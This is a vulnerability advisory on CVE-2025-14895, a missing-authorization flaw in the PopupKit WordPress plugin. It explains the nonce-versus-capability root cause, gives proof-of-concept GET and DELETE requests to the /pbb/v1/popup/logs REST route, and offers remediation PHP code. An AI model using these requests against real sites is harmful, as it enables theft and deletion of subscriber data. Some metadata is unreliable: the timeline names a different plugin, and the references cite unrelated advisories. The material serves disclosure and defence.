CVE-2025-14895 is a missing authorization vulnerability in PopupKit: REST endpoints that should be restricted to administrators are reachable by any authenticated user who can obtain a WordPress REST nonce. The most important point is that the endpoints do not merely leak harmless counters. They can return and delete records that represent marketing leads and subscriber activity, which are often treated as sensitive business assets. When a Subscriber can access this data, the plugin breaks the privacy and role separation model expected of WordPress, and it also creates a direct integrity issue because the same low privilege user can erase records and undermine reporting. This vulnerability is particularly relevant on sites with public registration and large numbers of low privilege accounts, which is common in ecommerce, membership, and community driven properties.
| Field | Value |
|---|---|
| CVE | CVE-2025-14895 |
| Plugin Version | PopupKit <= 2.2.0 |
| All Time | 338 757 |
| Active installations | 60 000+ |
| Publicly Published | December 16, 2025 |
| Last Updated | December 16, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0554 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/notificationx/notificationx-3111-missing-authorization-to-authenticated-contributor-analytics-reset https://t.me/cleantalk_researches/402 |
Timeline
| Date | Event |
|---|---|
| December 16, 2025 | Plugin testing and vulnerability detection in the Unlimited Elements for Elementor have been completed |
| December 16, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| February 9, 2026 | Registered CVE-2025-14895 |
Discovery of the Vulnerability
The root cause is that the server side permission logic relies on nonce validation rather than capability checks aligned to the sensitivity of the resource. The affected endpoints under /pbb/v1 accept authenticated requests with X-WP-Nonce and do not enforce a role or capability that would gate access to subscriber analytics and log management. In practice this becomes an IDOR style access control failure, because the attacker does not need to be assigned any PopupKit management role and does not need to pass a plugin specific permission callback. They only need to be logged in and able to retrieve a REST nonce from any admin context they can reach. Once they have that nonce, the endpoints allow broad queries across time ranges and also allow deletion using the same route, which confirms that authorization is missing rather than only a data scoping mistake.
Understanding Missing Auth attacks
In WordPress, nonces are not authorization. They are anti CSRF tokens that confirm request intent for users who are already authorized. When a plugin treats possession of a nonce as permission to access sensitive records, it effectively grants those permissions to every role that can obtain the nonce, which is often far broader than intended. Subscriber analytics and lead data are sensitive because they contain identifiers such as email addresses, names, device and event metadata, and sometimes form payloads that can include additional personal data. That creates both privacy and compliance risk, especially for organizations subject to GDPR style obligations. It also creates a business risk because lead lists are revenue generating assets and their deletion can cause real loss. A common real world scenario is a site that allows account creation for purchases or comments. A single attacker account can then harvest a list of leads, export it, and delete it, leaving only incomplete incident evidence. This is why the vulnerability is not just a bug. It enables quiet data theft and quiet data destruction using legitimate looking API calls.
Exploiting the Missing Auth Vulnerability
To exploit CVE-2025-14895, an attacker with Subscriber+ cookies:
POC:
```http
GET /wordpress/index.php?rest_route=/pbb/v1/popup/logs&startDate=2024-01-01&endDate=2025-12-31&type=devices HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: application/json, */*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-admin/post-new.php
X-WP-Nonce: a8a52738ef
Connection: keep-alive
Cookie: REDACTED
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
```

```http
DELETE /wordpress/index.php?rest_route=/pbb/v1/popup/logs&startDate=2024-01-01&endDate=2025-12-31&type=devices HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: application/json, */*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-admin/post-new.php
X-WP-Nonce: a8a52738ef
Connection: keep-alive
Cookie: REDACTED
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
```
The most direct risk is exposure of personal data and marketing intelligence. An attacker can enumerate analytics over long periods and extract email addresses, names, and behavioral metadata that can be used for phishing, competitive intelligence, or resale. The deletion aspect adds a second dimension. Attackers can erase evidence of lead capture, break attribution reporting, and cause real revenue loss by removing subscriber records that sales and marketing teams rely on. On sites that run campaigns, losing analytics can cause teams to make incorrect decisions and can create financial disputes with advertisers or partners. Another realistic scenario is a competitor or disgruntled user creating an account, harvesting the list, then deleting it to cover tracks and create operational chaos. Because the calls are authenticated and use a valid nonce, they can blend into normal traffic and may not trigger alerts unless the site has strong API logging. The combined confidentiality and integrity impact is why this should be treated as a high value data access control failure rather than a low priority bug.
Recommendations for Improved Security
The fix is to implement strict authorization in the REST permission callbacks and to stop relying on nonce presence as a permission boundary. The endpoints should require a high privilege capability such as manage_options or a dedicated PopupKit capability, and they should enforce object level or tenant scoping where applicable so that only users who are meant to manage subscribers can query and delete analytics. The delete operation should also require a POST or DELETE with a stricter intent token and should be rate limited and logged with actor user ID, IP, and query parameters to support incident response. From an operational perspective, site owners should audit which roles can obtain REST nonces, reduce admin access for low privilege roles, and monitor for unusual patterns such as very large date range queries followed by deletes. If exposure is suspected, assume the subscriber list has been compromised, rotate any related tokens, notify stakeholders as required, and restore analytics from backups if available.
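The capability-based permission check described above, as an added example that is not PopupKit's own code: the same function serves as the plugin-side `permission_callback` and, via the `rest_request_before_callbacks` filter, as a site-side guard for the `/pbb/v1/popup/logs` route with the actor, IP and parameter logging the recommendations call for. The function names are assumptions; the route path is the one from the PoC.

```php
<?php
// Added example (not PopupKit's code). Core cookie auth still verifies X-WP-Nonce;
// this adds the authorization layer the advisory says is missing.

// Plugin-side fix: use this as 'permission_callback' in register_rest_route()
// instead of '__return_true' or a check that only confirms the nonce.
function pbb_example_logs_permission( WP_REST_Request $request ) {
    // manage_options restricts the route to administrators.
    if ( ! current_user_can( 'manage_options' ) ) {
        return new WP_Error(
            'rest_forbidden',
            'Sorry, you are not allowed to manage popup analytics.',
            // 401 for anonymous callers, 403 for logged-in users without the capability
            array( 'status' => rest_authorization_required_code() )
        );
    }
    return true;
}

// Site-side guard (for example in an mu-plugin) for sites that cannot update yet:
// enforce the same check before the plugin's own callbacks run, and keep an audit trail.
add_filter( 'rest_request_before_callbacks', function ( $response, $handler, $request ) {
    if ( '/pbb/v1/popup/logs' !== $request->get_route() ) {
        return $response; // not the affected route, leave untouched
    }

    $actor  = get_current_user_id();
    $ip     = $_SERVER['REMOTE_ADDR'] ?? '-';
    $params = wp_json_encode( $request->get_query_params() );

    $allowed = pbb_example_logs_permission( $request );
    if ( is_wp_error( $allowed ) ) {
        // Log the denied attempt with actor user ID, IP and query parameters.
        error_log( sprintf( 'pbb guard: blocked %s %s user=%d ip=%s params=%s',
            $request->get_method(), $request->get_route(), $actor, $ip, $params ) );
        return $allowed; // a WP_Error here short-circuits dispatch with a 401/403 response
    }

    if ( 'DELETE' === $request->get_method() ) {
        // Permitted deletes are destructive, so record them for incident response.
        error_log( sprintf( 'pbb audit: DELETE logs user=%d ip=%s params=%s',
            $actor, $ip, $params ) );
    }
    return $response;
}, 10, 3 );
```

Rate limiting of the delete path is not shown; the audit lines above give the "large date range query followed by delete" pattern a place to be detected.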
By taking proactive measures to address Missing Auth like CVE-2025-14895 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
